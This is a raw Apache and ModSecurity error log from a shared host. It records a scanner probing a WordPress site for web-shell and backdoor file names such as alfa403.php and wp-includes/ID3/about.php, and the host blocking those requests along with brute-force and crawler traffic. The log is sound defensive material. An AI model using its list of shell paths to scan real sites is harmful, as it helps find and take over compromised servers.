[Tue May 26 14:28:46.312975 2026] [security2:error] [pid 610693:tid 610883] [client 20.195.199.65:48967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/samll.php"] [unique_id "ahVgxjvNO3hpmlY6M8RougAAADw"]
[Tue May 26 14:28:46.313082 2026] [security2:error] [pid 610693:tid 610883] [client 20.195.199.65:48967] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/samll.php"] [unique_id "ahVgxjvNO3hpmlY6M8RougAAADw"]
[Tue May 26 14:28:46.732027 2026] [security2:error] [pid 606909:tid 607077] [client 20.195.199.65:59395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/ingfo.php"] [unique_id "ahVgxl0yRtX9qA7aVUVuZAAAAKs"]
[Tue May 26 14:28:46.732142 2026] [security2:error] [pid 606909:tid 607077] [client 20.195.199.65:59395] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/ingfo.php"] [unique_id "ahVgxl0yRtX9qA7aVUVuZAAAAKs"]
[Tue May 26 14:28:47.119246 2026] [security2:error] [pid 606909:tid 607053] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgxl0yRtX9qA7aVUVuYwAAAJM"]
[Tue May 26 14:28:47.262406 2026] [security2:error] [pid 606909:tid 607098] [client 20.195.199.65:35214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/c55cdler.php"] [unique_id "ahVgx10yRtX9qA7aVUVuaQAAAMA"]
[Tue May 26 14:28:47.262522 2026] [security2:error] [pid 606909:tid 607098] [client 20.195.199.65:35214] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/c55cdler.php"] [unique_id "ahVgx10yRtX9qA7aVUVuaQAAAMA"]
[Tue May 26 14:28:47.663109 2026] [security2:error] [pid 610693:tid 610919] [client 20.195.199.65:23988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/error_log.php"] [unique_id "ahVgxzvNO3hpmlY6M8RozAAAAGA"]
[Tue May 26 14:28:47.663193 2026] [security2:error] [pid 610693:tid 610919] [client 20.195.199.65:23988] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/error_log.php"] [unique_id "ahVgxzvNO3hpmlY6M8RozAAAAGA"]
[Tue May 26 14:28:48.090712 2026] [security2:error] [pid 610693:tid 610948] [client 20.195.199.65:51076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/xenon1337.php"] [unique_id "ahVgyDvNO3hpmlY6M8Ro0wAAAH0"]
[Tue May 26 14:28:48.090829 2026] [security2:error] [pid 610693:tid 610948] [client 20.195.199.65:51076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/xenon1337.php"] [unique_id "ahVgyDvNO3hpmlY6M8Ro0wAAAH0"]
[Tue May 26 14:28:48.546237 2026] [security2:error] [pid 610693:tid 610838] [client 20.195.199.65:58082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/alfa403.php"] [unique_id "ahVgyDvNO3hpmlY6M8Ro2QAAAA8"]
[Tue May 26 14:28:48.546349 2026] [security2:error] [pid 610693:tid 610838] [client 20.195.199.65:58082] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/alfa403.php"] [unique_id "ahVgyDvNO3hpmlY6M8Ro2QAAAA8"]
[Tue May 26 14:28:48.874237 2026] [security2:error] [pid 606909:tid 607073] [client 68.183.88.172:35742] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/"] [unique_id "ahVgyF0yRtX9qA7aVUVuhQAAAKc"]
[Tue May 26 14:28:48.897301 2026] [security2:error] [pid 606909:tid 607144] [client 20.195.199.65:57119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/test11.php"] [unique_id "ahVgyF0yRtX9qA7aVUVuhwAAAO4"]
[Tue May 26 14:28:48.897405 2026] [security2:error] [pid 606909:tid 607144] [client 20.195.199.65:57119] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/test11.php"] [unique_id "ahVgyF0yRtX9qA7aVUVuhwAAAO4"]
[Tue May 26 14:28:48.999460 2026] [security2:error] [pid 610693:tid 610858] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgyDvNO3hpmlY6M8Ro2wAAACM"]
[Tue May 26 14:28:49.263112 2026] [security2:error] [pid 606909:tid 607108] [client 20.195.199.65:23976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/koala.php"] [unique_id "ahVgyV0yRtX9qA7aVUVujQAAAMo"]
[Tue May 26 14:28:49.263262 2026] [security2:error] [pid 606909:tid 607108] [client 20.195.199.65:23976] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/koala.php"] [unique_id "ahVgyV0yRtX9qA7aVUVujQAAAMo"]
[Tue May 26 14:28:49.628689 2026] [security2:error] [pid 610693:tid 610867] [client 20.195.199.65:47354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/mac.php"] [unique_id "ahVgyTvNO3hpmlY6M8Ro3wAAACw"]
[Tue May 26 14:28:49.628813 2026] [security2:error] [pid 610693:tid 610867] [client 20.195.199.65:47354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/mac.php"] [unique_id "ahVgyTvNO3hpmlY6M8Ro3wAAACw"]
[Tue May 26 14:28:49.785878 2026] [security2:error] [pid 610693:tid 610701] [remote 74.7.241.58:44936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVgyTvNO3hpmlY6M8Ro4wAAXwc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 14:28:50.090765 2026] [security2:error] [pid 606909:tid 607132] [client 20.195.199.65:48973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/25d653587fdfd1.php"] [unique_id "ahVgyl0yRtX9qA7aVUVumwAAAOI"]
[Tue May 26 14:28:50.090977 2026] [security2:error] [pid 606909:tid 607132] [client 20.195.199.65:48973] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/25d653587fdfd1.php"] [unique_id "ahVgyl0yRtX9qA7aVUVumwAAAOI"]
[Tue May 26 14:28:50.629224 2026] [security2:error] [pid 606909:tid 607111] [client 20.195.199.65:57092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/wefile.php"] [unique_id "ahVgyl0yRtX9qA7aVUVupwAAAM0"]
[Tue May 26 14:28:50.629361 2026] [security2:error] [pid 606909:tid 607111] [client 20.195.199.65:57092] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/wefile.php"] [unique_id "ahVgyl0yRtX9qA7aVUVupwAAAM0"]
[Tue May 26 14:28:50.711965 2026] [security2:error] [pid 606909:tid 607154] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgyl0yRtX9qA7aVUVunwAAAPg"]
[Tue May 26 14:28:51.033113 2026] [security2:error] [pid 606909:tid 607043] [client 20.195.199.65:23975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/casp3.php"] [unique_id "ahVgy10yRtX9qA7aVUVutwAAAIk"]
[Tue May 26 14:28:51.033247 2026] [security2:error] [pid 606909:tid 607043] [client 20.195.199.65:23975] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/casp3.php"] [unique_id "ahVgy10yRtX9qA7aVUVutwAAAIk"]
[Tue May 26 14:28:51.605750 2026] [autoindex:error] [pid 610693:tid 610863] [client 20.195.199.65:0] AH01276: Cannot serve directory /home2/debatqhn/obinnawrites.com/wp-includes/blocks/post-comments-form/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:28:51.606389 2026] [security2:error] [pid 610693:tid 610863] [client 20.195.199.65:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVgyzvNO3hpmlY6M8Ro_AAAACg"]
[Tue May 26 14:28:51.606860 2026] [security2:error] [pid 610693:tid 610908] [client 20.195.199.65:57135] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahVgyzvNO3hpmlY6M8Ro-wAAAFU"]
[Tue May 26 14:28:51.852493 2026] [autoindex:error] [pid 610693:tid 610826] [client 20.195.199.65:57135] AH01276: Cannot serve directory /home2/debatqhn/obinnawrites.com/wp-admin/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:28:51.853221 2026] [security2:error] [pid 610693:tid 610826] [client 20.195.199.65:57135] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "mail.obinnawrites.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVgyzvNO3hpmlY6M8Ro_gAAAAM"]
[Tue May 26 14:28:52.023116 2026] [security2:error] [pid 610693:tid 610947] [client 20.195.199.65:57135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVgzDvNO3hpmlY6M8RpAwAAAHw"]
[Tue May 26 14:28:52.023227 2026] [security2:error] [pid 610693:tid 610947] [client 20.195.199.65:57135] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVgzDvNO3hpmlY6M8RpAwAAAHw"]
[Tue May 26 14:28:52.468316 2026] [security2:error] [pid 610693:tid 610872] [client 20.195.199.65:40799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/half.php"] [unique_id "ahVgzDvNO3hpmlY6M8RpDQAAADE"]
[Tue May 26 14:28:52.468458 2026] [security2:error] [pid 610693:tid 610872] [client 20.195.199.65:40799] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/half.php"] [unique_id "ahVgzDvNO3hpmlY6M8RpDQAAADE"]
[Tue May 26 14:28:53.024287 2026] [security2:error] [pid 606909:tid 607048] [client 20.195.199.65:40777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/2P.php"] [unique_id "ahVgzV0yRtX9qA7aVUVuzgAAAI4"]
[Tue May 26 14:28:53.024392 2026] [security2:error] [pid 606909:tid 607048] [client 20.195.199.65:40777] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/2P.php"] [unique_id "ahVgzV0yRtX9qA7aVUVuzgAAAI4"]
[Tue May 26 14:28:53.267042 2026] [security2:error] [pid 610693:tid 610921] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgzDvNO3hpmlY6M8RpGAAAAGI"]
[Tue May 26 14:28:53.411258 2026] [security2:error] [pid 610693:tid 610880] [client 20.195.199.65:49020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/tires.php"] [unique_id "ahVgzTvNO3hpmlY6M8RpIQAAADk"]
[Tue May 26 14:28:53.411371 2026] [security2:error] [pid 610693:tid 610880] [client 20.195.199.65:49020] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/tires.php"] [unique_id "ahVgzTvNO3hpmlY6M8RpIQAAADk"]
[Tue May 26 14:28:53.790546 2026] [security2:error] [pid 610693:tid 610702] [remote 114.119.166.166:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "digitalgerminate.com"] [uri "/privacy-policy"] [unique_id "ahVgzTvNO3hpmlY6M8RpJgAAdgg"], referer: https://digitalgerminate.com/privacy-policy
[Tue May 26 14:28:54.236017 2026] [security2:error] [pid 606909:tid 607162] [client 20.195.199.65:47303] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.obinnawrites.com"] [uri "/index.php"] [unique_id "ahVgzV0yRtX9qA7aVUVu3QAAAQA"]
[Tue May 26 14:28:54.236044 2026] [security2:error] [pid 606909:tid 607162] [client 20.195.199.65:47303] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.obinnawrites.com"] [uri "/index.php"] [unique_id "ahVgzV0yRtX9qA7aVUVu3QAAAQA"]
[Tue May 26 14:28:54.562528 2026] [security2:error] [pid 606909:tid 607102] [client 20.195.199.65:47303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/like.php"] [unique_id "ahVgzl0yRtX9qA7aVUVu6QAAAMQ"]
[Tue May 26 14:28:54.562740 2026] [security2:error] [pid 606909:tid 607102] [client 20.195.199.65:47303] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/like.php"] [unique_id "ahVgzl0yRtX9qA7aVUVu6QAAAMQ"]
[Tue May 26 14:28:55.088922 2026] [security2:error] [pid 606909:tid 607155] [client 20.195.199.65:47310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/.well-known/about.php"] [unique_id "ahVgz10yRtX9qA7aVUVu9QAAAPk"]
[Tue May 26 14:28:55.089085 2026] [security2:error] [pid 606909:tid 607155] [client 20.195.199.65:47310] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/.well-known/about.php"] [unique_id "ahVgz10yRtX9qA7aVUVu9QAAAPk"]
[Tue May 26 14:28:55.175154 2026] [security2:error] [pid 610693:tid 610927] [client 62.60.130.233:56135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "onlineadda.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVgzzvNO3hpmlY6M8RpOwAAAGg"], referer: https://www.google.fr/search?q=wordpress
[Tue May 26 14:28:55.489689 2026] [security2:error] [pid 606909:tid 607123] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgz10yRtX9qA7aVUVu9AAAANk"]
[Tue May 26 14:28:55.530900 2026] [security2:error] [pid 610693:tid 610825] [client 62.60.130.233:51280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "onlineadda.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVgzzvNO3hpmlY6M8RpUQAAAAI"]
[Tue May 26 14:28:55.651371 2026] [security2:error] [pid 610693:tid 610893] [client 202.141.83.254:53888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgzzvNO3hpmlY6M8RpUgAAAEY"]
[Tue May 26 14:28:55.651554 2026] [security2:error] [pid 610693:tid 610893] [client 202.141.83.254:53888] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgzzvNO3hpmlY6M8RpUgAAAEY"]
[Tue May 26 14:28:55.734552 2026] [security2:error] [pid 606909:tid 607041] [client 20.195.199.65:23956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVgz10yRtX9qA7aVUVu-wAAAIc"]
[Tue May 26 14:28:55.734710 2026] [security2:error] [pid 606909:tid 607041] [client 20.195.199.65:23956] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVgz10yRtX9qA7aVUVu-wAAAIc"]
[Tue May 26 14:28:56.414743 2026] [security2:error] [pid 606909:tid 607070] [client 20.195.199.65:58112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/bob.php"] [unique_id "ahVg0F0yRtX9qA7aVUVvBQAAAKQ"]
[Tue May 26 14:28:56.414831 2026] [security2:error] [pid 606909:tid 607070] [client 20.195.199.65:58112] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/bob.php"] [unique_id "ahVg0F0yRtX9qA7aVUVvBQAAAKQ"]
[Tue May 26 14:28:56.959459 2026] [security2:error] [pid 610693:tid 610857] [client 20.195.199.65:47341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/t3s.php"] [unique_id "ahVg0DvNO3hpmlY6M8RpaQAAACI"]
[Tue May 26 14:28:56.959569 2026] [security2:error] [pid 610693:tid 610857] [client 20.195.199.65:47341] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/t3s.php"] [unique_id "ahVg0DvNO3hpmlY6M8RpaQAAACI"]
[Tue May 26 14:28:57.455314 2026] [security2:error] [pid 610693:tid 610832] [client 14.177.189.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg0TvNO3hpmlY6M8RpawAAAAk"]
[Tue May 26 14:28:57.492195 2026] [autoindex:error] [pid 610693:tid 610892] [client 20.195.199.65:57125] AH01276: Cannot serve directory /home2/debatqhn/obinnawrites.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
